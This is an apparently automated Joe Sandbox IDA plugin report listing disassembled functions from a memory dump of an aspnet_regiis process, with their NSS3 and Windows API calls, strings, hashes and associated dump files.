API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 65e774094ab858c842763edb72a7f0a421342c5f9725afeb532cc57810922f53
Instruction ID: 39d7eb546a906511cd7a2586fba009917a49cdd07ebe83af59624b9274367fbb
Opcode Fuzzy Hash: 65e774094ab858c842763edb72a7f0a421342c5f9725afeb532cc57810922f53
Instruction Fuzzy Hash: 8A110DB1B022404BEB00EB54DD59F4B36B8AB42659F1B0134E41657F40DB77F8948ADA

Function 6C344F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C344FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3451BB

Strings

unable to delete/modify user-function due to active statements, xrefs: 6C3451DF
misuse, xrefs: 6C3451AF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3451A5
%s at line %d of [%.10s], xrefs: 6C3451B4

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 20b08112554b7eb33d50bd76fc53422cf1126d8ecbb7f8af3b0d849432fa7f79
Instruction ID: e8bab59da77ddfe7a6bfbe3a17f261e5ae9e8fd8a931caa900e6c2e7f7064842
Opcode Fuzzy Hash: 20b08112554b7eb33d50bd76fc53422cf1126d8ecbb7f8af3b0d849432fa7f79
Instruction Fuzzy Hash: FE7179B5A0420A9BEF00CE15CC80FDA77E9FB48309F148529ED199BA81D336EC55CFA1

Function 6C4329E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C4321DD,00000000), ref: 6C432A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6C4321DD,00000002,00000000,00000000,?,?,6C4321DD,00000000), ref: 6C432A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C4321DD,00000000), ref: 6C432A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C432AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C432B0D
PK11_FreeSymKey.NSS3(?), ref: 6C432B7B
PK11_FreeSymKey.NSS3(?), ref: 6C432BD6

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: 0f17083a3da9b2235d64e596f0b0109baaddb42784d930a535fee9fe06931cf5
Instruction ID: 5ea0bb5574f2180f709ef07aed727e5cbcacc2fce5b95a7b28f8e75287fd2f14
Opcode Fuzzy Hash: 0f17083a3da9b2235d64e596f0b0109baaddb42784d930a535fee9fe06931cf5
Instruction Fuzzy Hash: 5B511671E002129BEB20DF66DC85FAA77A5AF8831CF151128ED1D57782EB31E906CBD1

Function 6C3D6980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 6C3D5DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D5DEC
Part of subcall function 6C3D5DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C3D5E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D69BA

Part of subcall function 6C41FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C3C9003,?), ref: 6C41FD91
Part of subcall function 6C41FD80: PORT_Alloc_Util.NSS3(A4686C42,?), ref: 6C41FDA2
Part of subcall function 6C41FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C42,?,?), ref: 6C41FDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C3D6A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D6AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D6ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D6AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3D6AE9

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: 10296afe314e0c500a3087a0fff46f5726ae7b87c5f9f16c552367e324bf8a27
Instruction ID: c316626924de0d3baaf98e7df6b936397a4e8c0c569fed52f669eaf53ee81204
Opcode Fuzzy Hash: 10296afe314e0c500a3087a0fff46f5726ae7b87c5f9f16c552367e324bf8a27
Instruction Fuzzy Hash: 6A4183B26406009BEB10DF64EC45F9677F9BF44354F168838E8AAC7640EF36F9158BA1

Function 6C40AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C40AB3E,?,?,?), ref: 6C40AC35

Part of subcall function 6C3ECEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C3ECF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C40AB3E,?,?,?), ref: 6C40AC55

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C40AB3E,?,?), ref: 6C40AC70

Part of subcall function 6C3EE300: TlsGetValue.KERNEL32 ref: 6C3EE33C
Part of subcall function 6C3EE300: EnterCriticalSection.KERNEL32(?), ref: 6C3EE350
Part of subcall function 6C3EE300: PR_Unlock.NSS3(?), ref: 6C3EE5BC
Part of subcall function 6C3EE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C3EE5CA
Part of subcall function 6C3EE300: TlsGetValue.KERNEL32 ref: 6C3EE5F2
Part of subcall function 6C3EE300: EnterCriticalSection.KERNEL32(?), ref: 6C3EE606
Part of subcall function 6C3EE300: PORT_Alloc_Util.NSS3(?), ref: 6C3EE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C40AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C40AB3E), ref: 6C40ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C40AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C40AD2B

Part of subcall function 6C3EF360: TlsGetValue.KERNEL32(00000000,?,6C40A904,?), ref: 6C3EF38B
Part of subcall function 6C3EF360: EnterCriticalSection.KERNEL32(?,?,?,6C40A904,?), ref: 6C3EF3A0
Part of subcall function 6C3EF360: PR_Unlock.NSS3(?,?,?,?,6C40A904,?), ref: 6C3EF3D3

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: ae940a77874499abd307ee623212f0271a2bb9dfddbb93044422c1c4060d2b33
Instruction ID: d456e285d0f11fee069efae21ee8500ae1dcc84811a7355289da0bd885657e2e
Opcode Fuzzy Hash: ae940a77874499abd307ee623212f0271a2bb9dfddbb93044422c1c4060d2b33
Instruction Fuzzy Hash: F43129B1F442195FEB00CF659C41DAF7776AF84318B1A8139E8155BB40EB31DC0587A1

Function 6C3C2920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3C294E

Part of subcall function 6C421820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C3C1D97,?,?), ref: 6C421836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3C296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3C2991

Part of subcall function 6C421820: PR_SetError.NSS3(FFFFE005,00000000,?,6C3C1D97,?,?), ref: 6C42184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3C29AF
PR_Now.NSS3 ref: 6C3C2A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3C2A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3C2A79

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: 839aa7a518564a7a6cb3696cfafae5478422af3d27a8fd31a32f61a7c8528db2
Instruction ID: e4e50ca013d5dd4a8e2f529391ea767e1b28b77cbbf451cf1288a28af0e7b6ac
Opcode Fuzzy Hash: 839aa7a518564a7a6cb3696cfafae5478422af3d27a8fd31a32f61a7c8528db2
Instruction Fuzzy Hash: 57418F75B093519FC714CE28C940E4FB7E9AB98718F155A2DE89893704EB31ED098B93

Function 6C3E8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C3E8C7C

Part of subcall function 6C489DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DC6
Part of subcall function 6C489DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4D0A27), ref: 6C489DD1
Part of subcall function 6C489DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C489DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3E8CB0
TlsGetValue.KERNEL32 ref: 6C3E8CD1
EnterCriticalSection.KERNEL32(?), ref: 6C3E8CE5
PR_Unlock.NSS3(?), ref: 6C3E8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C3E8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3E8D93

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: c0e38fe4172c82cec1954f36eafe803e2a74ccbdb8841b625e9ae2dd690dfd58
Instruction ID: 8e225e55f7498fb7e575f850a5d974144d89b597dc6c861e2c63923924808cad
Opcode Fuzzy Hash: c0e38fe4172c82cec1954f36eafe803e2a74ccbdb8841b625e9ae2dd690dfd58
Instruction Fuzzy Hash: EB312771E01611ABDB00AF6CCC44B9AB7B4BF59318F14013BEA1967B50D772A964CBD2

Function 6C3E2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C3DE728,?,00000038,?,?,00000000), ref: 6C3E2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C3E2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C3E2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C3E2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C3E2E9E
PR_Unlock.NSS3(?), ref: 6C3E2EAB
PR_Unlock.NSS3(?), ref: 6C3E2F0D

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 7e0123cab0048cc2aa68a1bb6ec645e503180339673e58cdfe74662edc404f9d
Instruction ID: b17bf70621c094bde4eddc681c7a56e340455fb31d8a1894026db119eb4f94d1
Opcode Fuzzy Hash: 7e0123cab0048cc2aa68a1bb6ec645e503180339673e58cdfe74662edc404f9d
Instruction Fuzzy Hash: CC3107B6A001169BEB00AF24DC4586AB779EF4925CB058175EC5887A11EB33EC54CBE1

Function 6C42CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C42CD93,?), ref: 6C42CEEE

Part of subcall function 6C4214C0: TlsGetValue.KERNEL32 ref: 6C4214E0
Part of subcall function 6C4214C0: EnterCriticalSection.KERNEL32 ref: 6C4214F5
Part of subcall function 6C4214C0: PR_Unlock.NSS3 ref: 6C42150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C42CD93,?), ref: 6C42CEFC

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C42CD93,?), ref: 6C42CF0B

Part of subcall function 6C420840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4208B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C42CD93,?), ref: 6C42CF1D

Part of subcall function 6C41FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C418D2D,?,00000000,?), ref: 6C41FB85
Part of subcall function 6C41FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C41FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C42CD93,?), ref: 6C42CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C42CD93,?), ref: 6C42CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C42CD93,?,?,?,?,?,?,?,?,?,?,?,6C42CD93,?), ref: 6C42CF78

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 39802015d21ecc6e3453290e4777be7bbda4d5914a8d57dd72882259f26315d4
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 5111C3B1E012005BF710EA666C42F6BB5EC9F4414AF01403DEC09D7B81FB65DA08C6E2

Function 6C3D8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3D8C1B
EnterCriticalSection.KERNEL32 ref: 6C3D8C34
PL_ArenaAllocate.NSS3 ref: 6C3D8C65
PR_Unlock.NSS3 ref: 6C3D8C9C
PR_Unlock.NSS3 ref: 6C3D8CB6

Part of subcall function 6C46DD70: TlsGetValue.KERNEL32 ref: 6C46DD8C
Part of subcall function 6C46DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C46DDB4

Strings

KRAM, xrefs: 6C3D8C8F

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 8754874adb67af6cfd738a39c4e9b05d384972ebf992bccb582c16d8fe0d4f29
Instruction ID: fecdd28ef681ac0ad6b8add71ee40fb8066a9a209acb2b329a32bda299389ad0
Opcode Fuzzy Hash: 8754874adb67af6cfd738a39c4e9b05d384972ebf992bccb582c16d8fe0d4f29
Instruction Fuzzy Hash: 5B214DB2605601CFD700AF79D484959FBF4FF05208B06896AD8888BB11DB36F885CFD2

Function 6C3E8E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C402E62,?,?,?,?,?,?,?,00000000,?,?,?,6C3D4F1C), ref: 6C3E8EA2

Part of subcall function 6C40F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C40F854
Part of subcall function 6C40F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C40F868
Part of subcall function 6C40F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C40F882
Part of subcall function 6C40F820: free.MOZGLUE(04C483FF,?,?), ref: 6C40F889
Part of subcall function 6C40F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C40F8A4
Part of subcall function 6C40F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C40F8AB
Part of subcall function 6C40F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C40F8C9
Part of subcall function 6C40F820: free.MOZGLUE(280F10EC,?,?), ref: 6C40F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C402E62,?,?,?,?,?,?,?,00000000,?,?,?,6C3D4F1C), ref: 6C3E8EC3
TlsGetValue.KERNEL32(?,?,?,6C402E62,?,?,?,?,?,?,?,00000000,?,?,?,6C3D4F1C), ref: 6C3E8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C402E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C3E8EF1
PR_Unlock.NSS3 ref: 6C3E8F20

Strings

b.@l, xrefs: 6C3E8E96, 6C3E8F25

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.@l
API String ID: 1978757487-918939912
Opcode ID: 92ce1f0785aa864efd7923911df6e6895ae2d65caa1c5cebf5904414fba99a9d
Instruction ID: a362216424608133f2733d8fc218db48b56683f581e25b7a95280e878199b859
Opcode Fuzzy Hash: 92ce1f0785aa864efd7923911df6e6895ae2d65caa1c5cebf5904414fba99a9d
Instruction Fuzzy Hash: D9217AB1A096159FD700AF29D484599BBF0FF48318F01456FE8989BB41E731E854CFD2

Function 6C418970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6C3C61C4,?,6C3C5639,00000000), ref: 6C418991
TlsGetValue.KERNEL32(?,?,?,?,?,6C3C5639,00000000), ref: 6C4189AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C3C5639,00000000), ref: 6C4189C6
PR_WaitCondVar.NSS3 ref: 6C4189F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C3C5639,00000000), ref: 6C418A0C

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

Strings

9V<l, xrefs: 6C418986

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
